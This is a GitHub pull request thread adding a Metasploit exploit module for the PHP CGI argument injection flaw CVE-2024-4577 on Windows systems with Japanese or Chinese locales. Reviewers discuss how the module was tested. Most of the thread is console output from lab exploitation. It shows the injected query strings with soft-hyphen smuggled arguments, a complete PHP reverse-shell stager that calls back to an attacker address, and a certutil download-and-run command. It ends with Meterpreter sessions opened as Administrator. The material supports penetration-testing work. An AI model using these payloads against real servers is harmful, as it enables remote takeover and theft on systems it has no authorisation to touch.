Add exploit module for the new PHP CGI Argument Injection vuln (CVE-2024-4577)

[sfewer-r7]

The (draft) pull request adds an exploit module for the new PHP CGI argument injection vulnerability disclosed yesterday. H/t to Orange Tsai who found the vuln (see the Devcore disclosure), and watchTowr for their analysis.

To-Do

• More testing on different configurations (I have only tested XAMPP in a Japanese locale)
• Documentation

Testing

I configured a Windows Server 2022 system with the Japanese locale (Code page 932). As XAMPP is known to be vulnerable in a default configuration, I installed XAMPP 8.2.12 / PHP 8.2.12 (direct download link here).

The exploit supports both PHP payloads (ARCH_PHP) and command payloads (ARCH_CMD). Note, for testing the ARCH_CMD payloads you may need to disable Defender if you are dropping a stock Meterpreter.

Example: Windows PHP Payload

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                    yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
   VHOST                            no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows PHP



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] Sending stage (39927 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49991) at 2024-06-07 15:31:53 +0100

meterpreter > getuid
Server username: Administrator
meterpreter > pwd
C:\xampp\php
meterpreter > sysinfo
Computer    : WIN-V28QNSO2H05
OS          : Windows NT WIN-V28QNSO2H05 10.0 build 20348 (Windows Server 2022) AMD64
Meterpreter : php/windows
meterpreter > 

Example: Windows Command Payload

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                    yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
   VHOST                            no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      EmrOsqzs         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] Sending stage (201798 bytes) to 192.168.86.50
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:49994) at 2024-06-07 15:33:10 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\xampp\php
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

[bcoles]

I haven't had a chance to play around with this bug in a test environment yet. I'm curious if we can use -s (%ADs) as a simply less-invasive check, like the similar 2012 bug?

metasploit-framework/modules/exploits/multi/http/php_cgi_arg_injection.rb

Line 84 in 9981a24

response = send_request_raw({ 'uri' => "#{uri}?#{create_arg('-s')}" })

[sfewer-r7]

I haven't had a chance to play around with this bug in a test environment yet. I'm curious if we can use -s (%ADs) as a simply less-invasive check, like the similar 2012 bug?

Good idea, I did a quick check against a vulnerable XAMPP server in a Japanese locale, and a non vulnerable XAMPP server in an English locale. Unfortunately, both responses when I just used -s (%ADs) was the same 500 Internal Server Error and I could not distinguish the vulnerable server from the non vulnerable server (The body/headers of both responses was the same).

[Chocapikk]

https://github.com/xcanwin/CVE-2024-4577-PHP-RCE

[jheysel-r7]

Thanks for the great module @sfewer-r7! Testing was as expected on a Windows server 2022 configured with Japanese locale with xampp 8.2.12 installed.

Testing

Windows PHP

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set verbose true
verbose => true
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] PHP content: <?php ; die(); ?>
[*] Query: %ADd+disable_functions%3D%22%22+%ADn+%ADd+cgi.redirect_status_env%3D0+%ADd+suhosin.simulation%3D1+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput+%ADd+cgi.force_redirect%3D0+%ADd+open_basedir%3D
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] PHP content: <?php /*<?php /**/ error_reporting(0); $ip = '172.16.199.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();; die(); ?>
[*] Query: %ADd+allow_url_include%3D1+%ADd+suhosin.simulation%3D1+%ADd+open_basedir%3D+%ADn+%ADd+disable_functions%3D%22%22+%ADd+cgi.force_redirect%3D0+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput+%ADd+cgi.redirect_status_env%3D0
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:50087) at 2024-06-17 11:10:07 -0700

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN-KFJKE852RLH
OS          : Windows NT WIN-KFJKE852RLH 10.0 build 20348 (Windows Server 2022) AMD64
Meterpreter : php/windows
meterpreter >

Windows Command

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set target 1
target => 1
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > run

[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\PfBDecBXKnQW.exe & start /B %TEMP%\PfBDecBXKnQW.exe
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] PHP content: <?php ; die(); ?>
[*] Query: %ADn+%ADd+cgi.redirect_status_env%3D0+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput+%ADd+open_basedir%3D+%ADd+suhosin.simulation%3D1+%ADd+disable_functions%3D%22%22+%ADd+cgi.force_redirect%3D0
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] PHP content: <?php $OAAbJDop = "certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\PfBDecBXKnQW.exe & start /B %TEMP%\PfBDecBXKnQW.exe";$OAAbJDop = str_replace('%TEMP%', sys_get_temp_dir(), $OAAbJDop);system($OAAbJDop); die(); ?>
[*] Query: %ADd+allow_url_include%3D1+%ADd+cgi.redirect_status_env%3D0+%ADd+disable_functions%3D%22%22+%ADd+open_basedir%3D+%ADn+%ADd+cgi.force_redirect%3D0+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput+%ADd+suhosin.simulation%3D1
[*] Client 172.16.199.131 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.131 (Microsoft-CryptoAPI/10.0)
[*] Client 172.16.199.131 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.131 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 172.16.199.131
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.131:50091) at 2024-06-17 11:16:01 -0700

meterpreter > getiod
[-] Unknown command: getiod. Did you mean getsid? Run the help command for more details.
meterpreter > getuid
Server username: WIN-KFJKE852RLH\Administrator
smeterpreter > sysinfo
Computer        : WIN-KFJKE852RLH
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

[jheysel-r7]

Release Notes

Windows systems running Japanese or Chinese (simplified or traditional) locales are vulnerable to a PHP CGI argument injection vulnerability. This exploit module returns a session running in the context of the Administrator user.